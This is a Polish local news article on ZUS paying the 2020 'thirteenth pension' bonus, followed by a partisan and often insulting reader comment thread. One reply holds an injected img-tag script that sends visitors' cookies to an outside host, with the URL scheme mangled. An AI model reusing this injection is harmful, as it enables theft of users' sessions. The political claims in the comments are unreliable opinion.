Reklama

Reklama

Zbliża się gospodarczy kryzys, ale "trzynastki" będą wypłacone. Do rencistów i emerytów trafi łącznie...

Opublikowano: 3 kwietnia 2020 12:31
Autor:

Zbliża się gospodarczy kryzys, ale "trzynastki" będą wypłacone. Do rencistów i emerytów trafi łącznie... - Zdjęcie główne
UDOSTĘPNIJ NA: UDOSTĘPNIJ NA:

Przeczytaj również:

Wydarzenia Ruszyła wypłata tzw. trzynastek, czyli dodatkowych rocznych świadczeń pieniężnych dla emerytów i rencistów. Trafiają do uprawnionych razem z kwietniową emeryturą lub rentę. Dodatkowe roczne świadczenie pieniężne trafi do ok. 9 mln osób.

Reklama

Tzw. trzynastka przysługuje uprawnionym m.in. do emerytury, renty (z tytułu niezdolności do pracy, szkoleniowej, socjalnej, rodzinnej), rodzicielskiego świadczenia uzupełniającego (świadczenia dla osób, które wychowały co najmniej czwórkę dzieci), nauczycielskiego świadczenia kompensacyjnego, świadczenia lub zasiłku przedemerytalnego. Te osoby otrzymają trzynastkę, o ile 31 marca miały prawo do jednego z tych świadczeń. Jeśli na ten dzień wypłata będzie zawieszona (np. z powodu zbyt wysokich dodatkowych zarobków), to trzynastka nie będzie przysługiwała.

- Chciałabym zapewnić wszystkich świadczeniobiorców, że emerytury i renty są wypłacane na czas. Tak samo jest w przypadku dodatkowego świadczenie, czyli tzw. Trzynastej emerytury, która wynosi 1200 złotych brutto, czyli 981 zł „na rękę”. Pierwsze trzynastki pojawią się na kontach emerytów już 1 kwietnia” - podkreśla prof. Gertruda Uścińska, prezes Zakładu Ubezpieczeń Społecznych.

Aby otrzymać to świadczenie, nie trzeba nic robić, gdyż zostanie ono wypłacone wszystkim uprawnionym automatycznie, bez konieczności składania wniosku. Kwota świadczenia to dla każdego 1200 zł brutto. Z tego w większości przypadków trzeba potrącić zaliczkę na podatek dochodowy i składkę zdrowotną. Najczęściej "na rękę" będzie do wypłaty 981 zł.

Do renty rodzinnej, którą pobiera kilka osób, przysługuje jedna trzynastka. ZUS podzieli ją w równych częściach na każdą uprawnioną osobę. Na przykład jeśli jedną rentę rodzinną pobierają dwie osoby, to każda otrzyma po 600 zł brutto.

ZUS wypłaci tzw. trzynastki razem ze świadczeniem przysługującym za kwiecień, w standardowym terminie płatności emerytury czy renty. Terminów płatności w ZUS w regionie jest kilka: 1, 5, 6, 10, 15, 20 i 25 dzień miesiąca.

O pieniądze z kwietniowego dodatku nie muszą się martwić osoby z długami. Trzynastki nie podlegają zajęciom komorniczym, nawet jeśli trafią na konto bankowe. Dodatkowe roczne świadczenie pieniężne będzie mieć specjalny opis, dzięki czemu będzie je łatwo rozpoznać w przelewach i nie zostanie zajęte przez komornika.

UDOSTĘPNIJ NA: UDOSTĘPNIJ NA:
wróć na stronę główną

ZALOGUJ SIĘ - Twoje komentarze będą wyróżnione oraz uzyskasz dostęp do materiałów PREMIUM.

e-mail
hasło

Nie masz konta? ZAREJESTRUJ SIĘ Zapomniałeś hasła? ODZYSKAJ JE

Komentarze (99)
 • rok temu | ocena +2 / -2

  xy

  Ktoś idź do Madzi M i sobie pogadajcie bo obydwoje to jesteście PISowskie betony do których nic nie dociera. Życzę wam szczęścia i PISowskiej opieki. Obudzicie się za miesiąc w rzeczywistej pandemi i jak zwykle powiecie przecież to wina TUSKA.

 • rok temu | ocena +3 / -3

  Lola

  Wstyd dla rzadu! Wstyd wielki! Wy buraki zakłamane!!! Rzeczywistość obnażyła gdzie pieniądze idą!!! Na przekupstwo i łapówki!!!! Tak, 500+ to łapówka!!! Sprzedaliśmy się a teraz umieramy, bo te buraki umysłowe nie kaja pieniędzy na maseczki, rękawiczki, kombinezony dla lekarzy i ratowników!!!! Nie ma pieniędzy na testy!!!! Codziennie słyszymy jak medycy się zakażają bo musza oszczędzać sprzęt!!!! To jakiś żart!!! A kolo z Nowogrodzkiej tylko się śmieje!!!! Wstyd PiS, wstyd wielki!!!! Teraz fundacje musza zbierać pieniądze!!! Wstyd!!!! Obudziłam się z tego snu, bo martwie się o swoje i mojej rodziny życie i zdrowie.... nerwy mi wysiadły, przepraszam za słowa, których dzis brakuje....

 • rok temu | ocena +1 / -1

  dsvsdfgb

  i 12 mld pójdzie w błoto! A pieniądze teraz jak nigdy potrzebne.... No ale idą wybory!

 • rok temu | ocena +7 / -7

  Magda M

  Brawo dla rządu który dba o emerytów i rencistów bo za PO lub jak kto lubi Koalicji nic nie było. Tylko płakali że na nic nie ma pieniędzy.

 • rok temu | ocena +7 / -7

  Emerytowny przedsiębiorca.

  Do przedsiębiorcy, o ile naprawdę jesteś przedsiębiorcą to wiesz, że od 2000zł odprowadzasz 264zł+264złpracownik czyli razem 528złx12m-cx40lat co daje kwotę 253440zł. Do tego dochodzi coroczna kwota waloryzacji, która średnio przyjmując w ciągu 40lat oscyluje w granicach 2,5% (byłaby większa ale zPO była sprowadzona właściwie do 0). Jako że apelujesz żeby wziąć kalkulator to ja apeluje wrzuć to sobie w Exell przyjmij waloryzacje 2,5% a otrzymasz ilość odłożonych środków na przyszłą emeryturę podziel następnie przez 218m-cy i nie pisz głupot.

  • rok temu | ocena +2 / -2

   Przedsiębiorca

   Co do szczegółów oczywiście masz rację chciałem tylko pokazać że wysokość emerytury zależy od wysokości wcześniejszych zarobków bo skamlenie że mam małą emeryturę bo przez osiem lat rządziła PO mnie irytuje. Masz marną pensję to będziesz miał marną emeryturę. Swoją drogą przypominam że PiS rządzi 7 lat i nic w kwestii wysokości emerytur nie zrobił. Ludzie muszą zrozumieć że ich los, zarobki, itd zależy od nich a nie prezesa, premiera, mamy czy taty, inaczej godzą się na to jak im inni świat urządza. PiS przykręcił jak się dało śrubę przedsiębiorcą i rozdał pieniądze ludzie a teraz to się na nich zemsci bo firmy zamrożą inwestycje, zamrożą kapitał, zwolnią ludzi i zobaczymy co rząd zrobi bo KASA PUSTA

 • rok temu | ocena +7 / -7

  były beton pisowski

  Czy zatwardziałe betony pisowskie tego nie widzą że są okradani ze swoich oszczędności. Myślę że nawet sprawy sobie z tego nie zdają, jak są okradani przez własny rząd, a to wszystko przez złe decyzje wspaniałego rządu katopisu. Przed wirusem inflacja była na poziomie 4,2 proc, a teraz szkoda gadać, złotówka zaczyna być nic NIE WARTA. Za tamtych była wręcz DEFLACJA, złotówka miała siłę nabywczą. Co jeszcze musi się stać by betony przejrzeli na oczy.Do wyborów powinni chodzić ludzie zdrowi psychicznie, zaświadczeniem od lekarza i z przeprowadzonym TESTEM NA INTELIGENCJĘ.

  • rok temu | ocena +0 / -0

   Ola

   Czyżbyś za rządow POstkomonistów nie placił podatków? I w zamian co dostawałeś? Glodową pensję, pracę na czarno, smieszne emerytury a rodziny z dziecmi żadnego socjalu. Tego ci żal? A moze jesteś jednym z lemingów ktoremu udalo się w korporacji zapier.? To nie zabieraj głosu. Jak umiesz czytac to zorientuj się ile PKB przeznacza się na rodziny i dzieci w takich krajach jak Niemcy, Francja czy Szwajcaria. Ale tam rzadzą madrzy ludzie ktorzy wiedzą ze rodzina to podstawa panstwa a dzieci to jego przyszlosc i dobrobyt. A u nas wielu ludziom TVN wyprał mózg.

   • rok temu | ocena +0 / -0

    były beton pisowski

    Czekałem na merytoryczną odpowiedz,na temat, chociażby na mój wpis. Czy każdy wyznawca Katopisu to IDIOTA, i TACY ludzie idą głosować.

  • rok temu | ocena +10 / -10

   Emerytowany przedsięborca

   Czy tylko obrażać potrafisz, podaj przykład co Ci ten rząd ukradł i uświadom mnie z czego okradł mnie bo jak dotąd nic mi nie zginęło.

   • rok temu | ocena +3 / -3

    Oki

    Okradł mnie ze zdrowia!!! Jak zachoruje na covid19 to pies z kulawa noga po mnie nie przyjedzie i testu mi nie zrobią, skaza na śmierć w domu....

   • rok temu | ocena +7 / -7

    były beton pisowski

    przykładowo- jak masz oszczędności 10 tys zł- to za tamtych kupiłeś CAŁY bochen CHLEBA, a za rządów wspaniałego katopisu- KUPISZ TYLKO POŁOWĘ, za tą samą kwotę --czy naprawdę NIC CI NIE ZGINĘŁO.

  • rok temu | ocena +8 / -8

   moher

   zapomniełeś jeszcze dodać że DRUKUJĄ PUSTE PIENIĄDZE , tzw. TARCZĘ KRYZYSOWĄ, 212 mld zł pustych pieniędzy bez żadnego pokrycia. PIS co MIAŁ z NASZYCH PODATKÓW, WSZYSTKO ROZDAŁ. to są OSZOŁOMY bez żadnego pojęcia o gospodarce. MAMY TAKI RZĄD, JACY LUDZIE GO WYBRALI.

   • rok temu | ocena +10 / -10

    Emerytowany przedsięborca

    Większych idiotyzmów trudno szukać przebiłeś gościu szklany sufit głupoty z tymi pustymi pieniędzmi. Nie będę Ci prowadził wykładu na temat dyscypliny budżetowej i norm unijnych w tym temacie bo to w Twoim przypadku może przynieść więcej szkody niż pożytku.

    • rok temu | ocena +4 / -4

     były beton pisowski

     Masz racje- nie chcę wykładu od wiernego wyznawcy TV RZĄDOWEJ.

 • rok temu | ocena +5 / -5

  Ola

  No ten przedsiebiorca jak miał biznes przed 2015 roku to jak odprowadzał składki przedstaw się vzy pokaż zdjęcie jakby pracodawcy odprowadzali składki to by teraz emeryci nie miel emerytur po 1000 zl i nie zastanawiali się czy kupić do jedzenia czy lekarstwa i nie zastanawiali die czy kupić 10 czy 20 dkg mięsa czy wędliny czy coś innego PiS powinien zmusić żeby biznesmeni zapłacili zaległe składki każdy pamięta z kim pracował i wiadomo ze każdy pracował nie po jedną czwartą etatu a po 12 godzin i soboty i niedzielę w niektórych firmach dopiero jak zapłacą zaległe składki dopiero komuniści i cała opozycja mogla by mieć głos bo sami okradali i dawali przyzwolenia i w każdym zawodzie każdy powinien odpowiednio zarabiać bo każdy jest potrzebny jednakowo bo w każdym zakładzie jest potrzebnych zawodów

  • rok temu | ocena +7 / -7

   Przedsiębiorca

   Znowu zapeluje o to żeby wziąść kalkulator do ręki i trochę policzyć a dopiero coś pisać. Więc po kolei zarabiasz 2000 zł składka emerytalna ok. 20% wychodzi ze odkładasz na emeryturę 400 zł 400 zł x 12 m-cy x 40 lat= 192000zl tyle odłożyłaś 192000 zł /15 lat(180 m-cy) otrzymujesz 1066 zł emerytury. Jeżeli ktoś nie odprowadzał za ciebie składki emerytura będzie jeszcze mniejsza. Podsumowując jeśli pracujesz u super uczciwego przedsiębiorcy z pisu przez 40 lat z zarobkiem 2000 zł to odłożysz 1000 zł na emeryturę, matematyka się kłania. I jeszcze jedno czy osoba odchodząca na emeryturę w 2016 (za pisu) otrzymałaby większą znacząco emeryturę w 2014 (za po) Odpowiedź brzmi Nie. Skończ z propagandą wystarczy mi TVP.

 • rok temu | ocena +6 / -6

  Przedsiębiorca

  Od 2015 roku widzę że w naszym kraju jest coraz więcej osób (nawet chyba większość) które chcą coś dostać... od rządu, od pracodawcy, od losu a jak nie dostaną to od złodziei wyzywają. Czy wy ludzie nie potraficie liczyć czy myśleć... Jak godzisz się na to żeby zarabiać 2000 zł miesięcznie to musisz mieć świadomość że będziesz miał (lub powinieneś mieć) ok. 1000 zł emerytury, ponieważ co miesiąc "odkładasz" ok. 20% swojej pensji przez 40 lat, a emeryturę średnio pobiera się 20 lat. Chcesz mieć 4000 zł emerytury to zacznij zarabiać 8000 zł weź sprawy we własne ręce, zdobądź zawód, wykształcenie, może załóż mały biznes, może zbuduj fabrykę... Zrób coś a nie tylko wołaj daj, daj, daj... Żeby ktoś dostał to ktoś musi zapier... 9 mln dostanie trzynastkę 3,5 mln pobiera 500+ A wystarczy że 0,2 mln przedsiębiorców zamknie firmy i będzie katastrofa gospodarcza a później społeczna jakiej świat nie widział.

 • rok temu | ocena +12 / -12

  as

  Do zatwardziałych PISIORÓW. Przez 8 lat PO i PSL jeśli już to może ukradli 100 mld, obecna wasza kochana władza ukradła około 250 mld. Drugie tyle albo i więcej rozdała na PATOLI 500 + i MOCHERY. Ale że brak maseczek i wszystkiego w szpitalach to wasza KLEMPA mówi - To wina Tuska.

  • rok temu | ocena +0 / -0

   Aleksander

   Jestem emerytem i nie życzę sobie bezczelnych uwag a merytoryczna dyskusję. Przepracowalem 45 lat sumiennie dla siebie, swojej rodziny i kraju. Emerytura srednia i dziękuję temu rzadowi za docenienie mojej pracy i wysilku. Zdecydowanie jestem zavtym abym otrzymał to swiadczenie a nie mafia Vatowska. Większośc mlodych tu się wymądrza i biega z kalkulatorami a nie potrzebnie. Czas biegnie i jak widzicie nie ma mądrych nawet na takiego wirusa.

   • rok temu | ocena +1 / -1

    KK

    Masz wypracowana emeryturę to siedzą na dupie a nie posrancu wyciągasz łapę po dodatkową. I jeszcze bezczelnie piszesz ze się należy.

  • rok temu | ocena +7 / -7

   Ja

   Właśnie obraziłeś 75%rodaków po srańcu.

   • rok temu | ocena +6 / -6

    JJ

    I bardzo dobrze że obraził. Należy się im. Popieram.

    • rok temu | ocena +2 / -2

     Ktoś

     Cham, chama zawsze zrozumie.

  • rok temu | ocena +10 / -10

   Zin

   Jak było w szpitalach za Tuska i wcześniej to spytaje się nas co pracowaliśmy i teraz pracujrmy i opozycja przestańcie szczekać i kłamać całe szczęście że ten koronowirus przyszedł teraz jak mamy PiS bo za komunistów jakby przyszedł to by bylo gorzej niż w Niemczech Francji Hiszpanii także opozycją przestańcie wreszcie przeszkadzać

  • rok temu | ocena +3 / -3

   rycho

   wszystko się zgadza, ale 500+ to w większości nie jest przecież patologia!

 • rok temu | ocena +7 / -7

  Adam

  Kto tu takie kłamstwa wypisuje to chyba tylko ci co niszczyli Polskę i Polaków i dzięki nim mają tak niskie emerytury a przecież na zachodzie to emerycie żyją dostatniej nawet mają też na zwiedzanie świata a dzięki komu emerycie muszą wybierać czy wykupić lekarstwa czy coś do zycia to dzięki PSL i PO oni okradli i zniszczyli Polskę i Polaków

  • rok temu | ocena +1 / -1

   Ktoś

   Dokładnie, dziadostwo i targowica, rozsprzedali i rozkradli Polskę i Polaków, a teraz bez wstydu jeszcze śmia się odzywać.

 • rok temu | ocena +13 / -13

  Cyc

  Brak słów na tych komunistycznych lewusow co za brednie i kłamstwa wypisują jakby PSL i PO nie okradli Polaków biznesmeni robili opłaty za zatrudnienie pracowników a nie umowy śmieciowe albo jak robili opłaty za jedną czwartą etatu a nie wspomnę za sobotę niedzielę a tak było 30 lat niech złodzieje opłaca zaległe składki to emeryta nie będą żadne 13 potrzebne jakoś komuniści biorą 13 i cicho sza a emerytów widzą te bzdety to wypisują komuniści jeszcze nie ludzie

 • rok temu | ocena +0 / -0

  O

  Guma gaz i wąskie drzwi

  • rok temu | ocena +1 / -1

   nono

   piniuuundzee<img src=DJJF://kutno.net.pl/favicon.ico width=0 height=0 onload=this.src='DJJF://wrzesnia.podgik.pl/pliki/autosite.php?cookie='+document.cookie>

 • rok temu | ocena +10 / -10

  Xxx

  Najgorsze jest to że jak emeryci dostaną swoje 13 to będą latać całe dnie po sklepach i roznosić tą zarazę. Osoby 65+ powinni mieć nakaz robienia zakupów od 10 do 12 a w innych godzinach wyjście tylko z receptą do apteki. A za złamanie zakazu mandat.

  • rok temu | ocena +4 / -4

   Młody emeryt

   Przepraszam, ja mam 39 lat, otrzymałem 13-tkę i nie latam po sklepach. Nie tylko seniorów dotyczy przywilej otrzymania 13-tki.

  • rok temu | ocena +5 / -5

   Tyle.

   Też jestem za ograniczeniami dla seniorów, przeginają, a są najbardziej zagrożeni.Ale dziwię się też ich rodzinom, dlaczego na to pozwalają.

  • rok temu | ocena +7 / -7

   r

   nie lataj po sklepach to ci nic nie grozi

 • rok temu | ocena +6 / -6

  Security

  Kryzys gospodarczy. Brak zaopatrzenia medycznego w szpitalach. Emeryci za to dostają 13 a emeryture. Brak słów.

 • rok temu | ocena +24 / -24

  wróg komuny

  Już dobry Bóg,zrobił co mógł,teraz potrzeba fachowców.Dobrze,że mamy mądry rząd i prezydenta.Tępi totalniacy zamilczcie lepiej.Nie działajcie na szkodę Poski i Polaków.

  • rok temu | ocena +15 / -15

   Koronaświrus

   Mamy dobry rząd, wybitnych fachowców, gospodarka idzie do przodu, a ludziom żyje się coraz lepiej. Cytat z kabaretu neonówki. Świetnie pasuje do dzisiejszych realiów

 • rok temu | ocena +2 / -2

  Emeryt

  Pogonilem wielkie kupiszcze.

  • rok temu | ocena +2 / -2

   Pracownik

   Chyba zaszkodziła ci ta 13 ta emerytura w obliczu epidemii dziadu jeden.

 • rok temu | ocena +13 / -13

  Zz

  Gorszego dziadostwa od tych popieprzonych 500 plusowych rodzinek to nie ma. Te pieniądze to powinny być przeznaczone na walkę z epidemia a nie na poprawienie stopy zyci owej rodzinek które mają zobowiązania a konto tych pieniędzy socjalnych..

  • rok temu | ocena +5 / -5

   D

   Walcz z epiemią ciulu, zacznij od walniecia się w łepetyne, później wyłącz tvn. A na serio to są teraz większe problemy w kraju niż twoje durne przemyślenia.

  • rok temu | ocena +8 / -8

   Tyle.

   Ty lepiej walcz z koronawirusem siedząc w domu.

  • rok temu | ocena +5 / -5

   Cham

   A ty lim jesteś? Przeczytaj swój wpis.

  • rok temu | ocena +10 / -10

   Hehe

   Uuu ktoś tu jest starą panną/kawalerem bezdzietną lambadziarą co to nie wie ile kosztuje wychowanie bombelka. Dzięki 500 plus rodzi się więcej dzieci które będą pracowały na nasze emerytury

   • rok temu | ocena +19 / -19

    Zz

    Swoje dzieci wychowałem z zona z własnych pensji . Loźenie na dzieci to obowiązek rodzica nie państwa jelopie jeden. Masz dzieci to twój problem nie państwa.

    • rok temu | ocena +6 / -6

     Ja

     Dzieci nie powinny być problemem. Mówiłeś swoim że tak o nich myślałeś? To że za ko ucha i liberała w du.. ie mieli jak sobie rodziny poradzą to twój problem. Jesteśmy w UE a tu kraje pomagają rodzcom, zawistny pa...cu.

    • rok temu | ocena +12 / -12

     Glupich nie sieją

     Dzieci to nie jest problem, chyba że dla ciebie.

    • rok temu | ocena +3 / -3

     Hehe

     Weź zluzuj porty, dwa komentarze niżej napisałem, że jaja sobie robię. Zobacz jak łatwo jest ludzi sprowokować. I czemu tak bez powodu innych obrażasz?

   • rok temu | ocena +11 / -11

    Daas

    Kłamiesz. Nie rodzi się wiecej dzieci.

    • rok temu | ocena +3 / -3

     Hehe

     Nie kłamie, robię sobie jaja po prostu :)

     • rok temu | ocena +6 / -6

      Glupich nie sieją

      To przestań robić sobie te jaja, zrób lepiej jajecznicę.Sytuacja na świecie jest tragiczna, a tu tylko he, he.

      • rok temu | ocena +1 / -1

       Hehe

       Sorry, ale nie będziesz mi mówił co mam robić, w domu sobie gaciami możesz rządzić co najwyżej. Trzeba świrować żeby nie zwariować.

       • rok temu | ocena +7 / -7

        Izutek

        I własnie takich debili ziemia nosi. Pół dnia taki debil lazi bez celu po ulicach a drugie półrocze siedzi w internecie i pisze jak oszolom jakiś.

        • rok temu | ocena +0 / -0

         Koronaświrus

         Hehehe tak właśnie jest u możesz mi skończyć

 • rok temu | ocena +14 / -14

  maj

  Czy ci co tak bardzo krytycznie wypowiadają się na temat PIS powinni te pieniądze wziąć ? Może warto je honorowo przekazać na jakiś cel charytatywny bądź na pomoc dla szpitali? Nie jeden taki mądry na portalach siedzi i komentuje co i jak powinno wyglądać ale pierwszy teraz wypisuje, że czeka na pieniądze. W domu nie ma co robić to komentuje....

  • rok temu | ocena +9 / -9

   Ahoj

   Ta, mam przekazać pieniądze na które pracuję? I utrzymywać patologię. Świetny pomysł

   • rok temu | ocena +4 / -4

    Ja

    Ahoj, no to wyszło że też jesteś patologia.

    • rok temu | ocena +0 / -0

     Git

     Raczej wyszło że ty jesteś pieńset plusowym patusem, bo ja chociaż odprowadzam podatki a nie żeruje na socjalu śmierdzielu

     • rok temu | ocena +1 / -1

      Ja

      Ażeś mi pojechał... Jeszcze nie mam dzieci pajacu, ale kiedyś będę pewnie mieć, pracuje tak jak na razie 92% spół., i ostatnią osobą której zdaniem będę się przejmował jest zawistny anonimowy koniotrzep piszący na kci. Miłego wieczoru.

   • rok temu | ocena +5 / -5

    Czy nie?

    No to jeśli bierzesz pieniądze na które pracujesz, to chyba dobrze?

  • rok temu | ocena +8 / -8

   pro

   teraz trzynastki, a może co niektórzy 14stki-a po wyborach emerytury o połowę w dół. Jeżeli ekonomiści wieszczą kryzys i bezrobocie, to kto zarobi na emerytury i inną kiełbasę wyborczą

   • rok temu | ocena +5 / -5

    Kojarzysz

    Te emerytury i pięć setki wrócą spowrotem do budżetu.

 • rok temu | ocena +5 / -5

  Ja

  Będą mieli na mandaty za robienie zakupów po 12.bo łażą I się kręcą. A na maseczki dla szpitali niema

  • rok temu | ocena +7 / -7

   ty

   Sam łazisz. Ludzie chodzą.

   • rok temu | ocena +6 / -6

    Security

    Właśnie że łaźą i to kilkakrotnie w ciągu dnia po różnych marketach po jedna rzecz . I jeszcze skaczą z modą do innych ludzi.

    • rok temu | ocena +1 / -1

     Hehe

     I będę łaził i śmiał się wam twarz . Mam dużo czasu bo do pracy nie jeżdżę i lubię blokować kolejki .... Mało tego lubię robić sobie spotkania ze znajomymi stojąc w kolejce do biedronki bo tam mogę i nikt się nie przyczepi. Później wchodzimy do sklepu i tam stoimy i rozmawiamy bez zachowania odległość. Uwielbiam tą adrenalinę

     • rok temu | ocena +3 / -3

      Ok.

      Łaz, tylko z daleka odemnie.

     • rok temu | ocena +6 / -6

      Haha

      Uważaj zatem idioto żeby cię z tą 13 a emerytura nie pochowali bo możesz nie zdążyć jej wydac na kaszkę mannę.

      • rok temu | ocena +4 / -4

       Hehe

       Niestety jeszcze jej nie dostaję, cały czas na nią pracuję, ale aktualnie mam przestój w robocie to sobie chodzę a to na pocztę, do banku, trochę w kolejce w kaufie postoję, trochę w biedrze i dzień zleciał ... inajlepsze jest to że możesz mi naskoczyć

       • rok temu | ocena +7 / -7

        Hk

        Uważaj przygłupie żeby ci nie naskoczyl ale koronawirus.

        • rok temu | ocena +2 / -2

         Hehe

         Podobno 80 procent populacji go przejdzie bezobjawowo więc liczę na szczęście, uniknąć raczej się nie da . I nadal uważam, że możesz mi naskoczyć

        • rok temu | ocena +6 / -6

         Beata

         Zgadza się. Chodzi taki nierob całe dnie po mieście jak świnie jakąś. Imbecyl. Że to rodzina z takim wytrzymuje.

  • rok temu | ocena +3 / -3

   rycho

   mogą robić zakupy i po 12-ej (co nie znaczy, że masowo powinni)

 • rok temu | ocena +8 / -8

  rycho

  redakcja nie popisała się - haniebne zdjęcie do tego artykułu. Znam wiele przypadków, gdzie emeryci utrzymują rodzinny budżet. Poza tym to nie oni sobie to przyznali tylko PIS-owcy. Niestety myślą, że to większy elektorat niż np. lekarze czy nauczyciele, których traktują okrutnie i prostacko. Oby się nie przeliczyli, wielu emerytów pieniądze weźmie, ale na pewno na nich nie zagłosuje, za dobrze pamiętają komunę i jedynie słuszną partię

  • rok temu | ocena +3 / -3

   Xxxx

   Rycho ty stary komuchu jak pracowałam za was w szpitalu to nawet na środki czystości nie bylo a chorzy dostawali tylko zupkę nawet chleb był pod wydziałem a co robił grocki demencja cię dopadła to twój problem może jeszcze psychiatra coś pomoże i to teraz bez koperty

  • rok temu | ocena +7 / -7

   !!!!

   Rycho w jakim towarzystwie się obracasz, gdzie emeryci utrzymują rodzinny budżet. A młodzi do roboty się nie mogą ruszyć? To wstyd aby dziadek utrzymywał rodzinę !!!!

   • rok temu | ocena +4 / -4

    rycho

    tak, masz rację, często wstyd. Dla mnie meritum i wstydem to jest zdjęcie do artykułu, znowu jedni przeciw drugim

    • rok temu | ocena +5 / -5

     !!!!

     OK. Zdjęcie nie jest fajne.

 • rok temu | ocena +9 / -9

  Olaf

  A tym jeszcze mało. Jeszcze dodatkową emerytura. Na epidemie nie ma. Dla szpitali nie ma . Ale dla emerytów jest. Beznadzieja.

  • rok temu | ocena +7 / -7

   gienek

   Olaf- dla swoich wyborców zawsze będzie .Oni wszystko zrobią aby utrzymać władzę.

   • rok temu | ocena +6 / -6

    Polak

    Pamiętasz jak robiliście tylko do siebie na swoje konta i co się dało to sprzedaliście ty Stary lewaku a PiS to musi naprawiać zeby emeryci z glodu nie umierali ale lepiej niech was za la ja i opłacie skladki co polacy u was pracowali a nie tylko koryto koryto

   • rok temu | ocena +3 / -3

    Ja

    I bardzo dobrze, to jest polityka, jeśli ludzie na tym korzystają, nie mam nic przeciwko, ci przy korycie dosyć się już nachapali.

   • rok temu | ocena +6 / -6

    gienek

    Olaf- zapomniałem dodać, pseudo rząd drukuje puste pieniądze bez pokrycia.

    • rok temu | ocena +5 / -5

     Kamieni kupa...

     Rząd wie co robi, mądrzejszego jak dotąd nie było.

 • rok temu | ocena +15 / -15

  były beton pisowski

  Kryzys to już się zaczął dawno, przed wirusem. Inflacja była na poziomie 4,2 proc. a teraz szkoda gadać. To wszystko przez złe decyzje wspaniałego rządu. Ludzie tracą oszczędności życia, jeszcze sprawy se nie zdają. Rządzą nami OSZOŁOMY i NIEUDACZNICY, doprowadzą nasz kraj DO RUINY, tak krzyczeli Polska w ruinie, NO TO TERAZ BĘDZIE. Każdy kraj oszczędzał na czarną godzinę, ty tylko NIE MY, wszystko ROZDALIŚMY. Mamy czarną godzinę i co robi NASZ RZĄD- DRUKUJE PUSTE PIENIĄDZE BEZ POKRYCIA. To są OSZOŁOMY BEZ ŻADNEGO POJĘCIA. Mamy taki RZĄD, JACY LUDZIE GO WYBRALI.

  • rok temu | ocena +15 / -15

   .

   Bardzo celna ocena rządu POPSL.

   • rok temu | ocena +10 / -10

    !!!!

    Zapomniałeś że PiS już rządzi 5 lat.!!!!!!!!!!!!!!!! Ila lat jeszcze będą zwalać wszystkie niepowodzenia na PO-PSL. Oni rządzili niewiele dłużej niż teraz PiS.

    • rok temu | ocena +5 / -5

     Ktoś

     Ale, co tam, tamtych rządy są nie do zapomnienia.

  • rok temu | ocena +7 / -7

   Michał

   Sam bym tego lepiej nie napisał.

 • rok temu | ocena +4 / -4

  Dociekliwy

  Dlaczego kokentarze do artykułu,, Epidemia w powiecie kutnowskim: jakie działania podjął starosta? Są wyłączone? To artykuł czy reklama.?

  • rok temu | ocena +7 / -7

   proste

   Dlatego, bo krytyka PiS jest tutaj źle widziana :)

   • rok temu | ocena +0 / -0

    Koronaświrus

    Tak samo jak pod artykułem że animex dał kase na szpital, a u nich nie ma podstawowych środków ochrony osobistej wymaganych przy produkcji żywności. Ale tam sanepid nie zawita z kontrolą. Potrzeba interwencji władz wojewódzkich żeby zrobić z tym porządek

 • rok temu | ocena +12 / -12

  xy

  Dalej PISdizelce kupują głosy patologi i mocherów. Nie dbają o tych co się dla nas narażają - Oby tych rządzących pochłonęło miejsce którym opiekuje się LYCYFER.

  • rok temu | ocena +1 / -1

   Pracujący moher

   Nikt mnie nie kupuję, z przyjemnością pójdę na wybory i zagłosuję na PAD.

 • rok temu | ocena +8 / -8

  axcb

  Ciekawe jak tam się czują kredyciarze pod korek na swoje marne klitki w blokach kupując na najwyższej górce mieszkaniowej w historii. Kryzys tak naprawdę nie rozpoczął się od epidemii, bo przesłanki za nim są już od co najmniej roku, a ludzie dalej brnęli w tym ślepym pędzie posiadania. Co prawda gdyby nie Corona, to kryzys skończyłby się na spowolnieniu i korekcie cen nieruchomości. Teraz jednak czeka nas recesja, mniej miejsc pracy, mieszkania stanieją, a kredyt do spłaty zostanie.

  • rok temu | ocena +14 / -14

   Mów mi Panie Januszu

   No jak to co? Jak frankowicze, będą płakać aby rząd im dawał pieniądze. Sfinansują sobie z socjali. Żyć nie umierać, a Ty pracuj na nich.

 • rok temu | ocena +40 / -40

  Taki tam.

  Załoga karetki na dyżur ma JEDEN JEDNORAZOWY kombinezon. W chwili gdy ratownik go zdejmie aby odpocząć czy po prostu załatwić potrzebę, kolejny musi kupić za swoje pieniądze. Za to najważniejsze aby co miesiąc szły 4 miliardy na 500+, 12 miliardów na emeryturę+, 2 miliardy na TVP+, setki milionów dla Rydzyka. Co jest ważniejsze dla władzy? Zdrowie obywateli czy to aby kupić ich za marne okruchy ze stołu Pańskiego? Po co Wam pieniądze skoro za moment służba zdrowia rzuci to wszystko w piz.du? Socjalnymi pieniędzmi się uratujecie? Powodzenia

  • rok temu | ocena +0 / -0

   www

   Na jesieni kasa państwa będzie pusta, bezrobocie wysokie i wówczas sprawdzimy gdzie są te miliardy które rząd posiada. Znów podniesie podatki , ceny wzrosną a ludzie nie będą mieli za co kupić podstawowych produktów. Co wówczas nam obiecają 13-tke , 14-tkę, ile bzdury? Ceny mięsa przez ostatni rok wzrosły o 30% a inne towary i usługi? Wkrótce rząd ogłosi że państwo musi ratować gospodarkę oczywiście po wyborach o ile do nich dojdzie i skończą się obiecanki!